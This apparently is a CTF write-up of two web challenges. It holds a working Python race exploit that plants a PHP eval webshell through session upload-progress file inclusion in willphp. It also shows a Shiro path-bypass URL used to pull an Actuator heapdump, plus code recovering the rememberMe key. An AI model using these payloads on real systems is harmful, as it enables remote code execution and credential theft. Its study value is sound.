Web1 easywill

The challenge ships no source code; going by the description, I downloaded a copy of easywill V2.1.5 from the web (https://gitee.com/willphp/willphpv2/tree/808b3a36d366f66a88fd130cc6514c20eaf15450/).

On the index page, `assign` takes two user-controlled parameters; reading the `view` function shows that the variable `cfile` can be overwritten with them.

So we try a session-file inclusion.

Exp

# coding=utf-8
import io
import requests
import threading

sessid = 'flag'
data = {"cmd": "system('cat /ffffffff14ggggggg3');"}
url = "http://eci-2zec2ffu8ckzf0eggcpe.cloudeci1.ichunqiu.com/index.php"


def write(session):
    # Writer threads: keep the upload-progress session file populated
    # while the upload is in flight.
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        resp = session.post(url,
                            data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST["cmd"]);?>'},
                            files={'file': ('midi.txt', f)},
                            cookies={'PHPSESSID': sessid})


def read(session):
    # Reader threads: race the writers by pointing the overwritable
    # cfile variable at the session file.
    while True:
        resp = session.post(url + '?name=cfile&value=/tmp/sess_' + sessid,
                            data=data)
        if 'midi.txt' in resp.text:
            print(resp.text)
            event.clear()


if __name__ == "__main__":
    event = threading.Event()
    with requests.session() as session:
        for i in range(1, 30):
            threading.Thread(target=write, args=(session,)).start()

        for i in range(1, 30):
            threading.Thread(target=read, args=(session,)).start()
        event.set()

Web2 Pentest in Autumn

The attachment provided by the challenge is a pom.xml.

The pom.xml includes the Actuator dependency.

http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/actuator

Common Spring Boot Actuator endpoints (in 1.x they are reachable directly at the root; in 2.x they live under the /actuator path).

Since we have no permission, the following requests all return 302.

http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/actuator/health

http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/actuator/env

(information leakage)

Shiro 1.5 authentication bypass to download the files

http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/aa/../;test=/actuator/health

Download all the files.

Download the heapdump.

http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/aa/../;test=/actuator/heapdump
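From the defender's side, the request above is easy to spot in access logs: the raw path never starts with /actuator, but once the `;` path parameter and the `..` segment are resolved the way the servlet container resolves them, it does. The following scanner is an added example, not part of the original writeup; the log lines, the log format and the protected-prefix list are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample access-log lines (common log format), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Oct/2023:10:00:01 +0800] "GET /actuator/health HTTP/1.1" 302 0
10.0.0.5 - - [01/Oct/2023:10:00:02 +0800] "GET /aa/../;test=/actuator/health HTTP/1.1" 200 15
10.0.0.5 - - [01/Oct/2023:10:00:03 +0800] "GET /aa/../;test=/actuator/heapdump HTTP/1.1" 200 83214
10.0.0.7 - - [01/Oct/2023:10:00:04 +0800] "GET /index.html HTTP/1.1" 200 512
"""

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Assumed list of prefixes that the Shiro filter chain is supposed to protect.
PROTECTED_PREFIXES = ('/actuator',)


def container_normalize(raw_path):
    """Approximate the path the servlet container dispatches on: strip the
    ';param' part of every segment, percent-decode, collapse '.' and '..'."""
    path = unquote(urlsplit(raw_path).path)
    out = []
    for seg in path.split('/'):
        seg = seg.split(';', 1)[0]          # drop path (matrix) parameters
        if seg in ('', '.'):
            continue
        if seg == '..':
            if out:
                out.pop()
            continue
        out.append(seg)
    return '/' + '/'.join(out)


def find_bypass_attempts(log_text, protected=PROTECTED_PREFIXES):
    """Return (raw_path, resolved_path, status) for requests whose raw path
    does not look like a protected endpoint but resolves to one."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        raw = m.group('path')
        resolved = container_normalize(raw)
        odd_shape = ';' in raw or '/../' in raw or raw.endswith('/..')
        if odd_shape and resolved.startswith(protected) and not raw.startswith(protected):
            hits.append((raw, resolved, int(m.group('status'))))
    return hits
```

A 200 on such a resolved /actuator path, where a direct request gets a 302, is the signal that the filter chain and the container disagree about the path.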

Open the downloaded heapdump file with VisualVM.

https://visualvm.github.io/download.html

Search the whole dump for org.apache.shiro.web.mgt.CookieRememberMeManager.

Convert the byte values into the base64 form of the key.

import base64
import struct

# The 16 signed byte values read from the CookieRememberMeManager key field
# in the heapdump; pack them as little-endian signed bytes and base64-encode.
res = base64.b64encode(struct.pack('<16b', 58, 5, 22, 5, 117, 45, -35, 82, -15, 62, -57, 117, -78, 15, 23, -89))
print(res)

(Reference: https://www.cnblogs.com/icez/p/Actuator_heapdump_exploit.html)

CB chain, Spring echo.